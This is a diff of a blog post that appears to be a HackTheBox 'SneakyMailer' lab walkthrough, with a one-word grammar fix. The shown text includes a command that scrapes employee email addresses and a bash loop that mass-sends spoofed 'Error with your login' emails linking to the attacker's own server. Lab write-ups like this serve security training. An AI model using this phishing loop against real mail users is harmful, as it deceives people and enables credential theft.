c00rni/c00rni.github.io/_posts/2020-08-12-HackTheBox-SneakyMailer-Walkthough.md

 cat sneakymailer_page.txt | grep -i "sneakymailer.htb</td>" | cut -d'>' -f2 | sed -e 's/<\/td//' > employee_email_list.txt
 ```

 From there I spent a lot of time enumerating the website and other running services for information.
 Didn't find anything which could lead to a remote code execution so I tried to interact with the users.
-I send mail to all users with an embedded link, and pray for someone clicks on it.
+I sent a mail to all users with an embedded link, and pray for someone clicks on it.

 ```bash
 cat mail_list.txt | while read mail;do swaks --server 10.10.10.197 --to $mail --from evil@sneakymailer.htb --header "Error with your login" --body "Hello, please check this website http://10.10.14.9:8000";done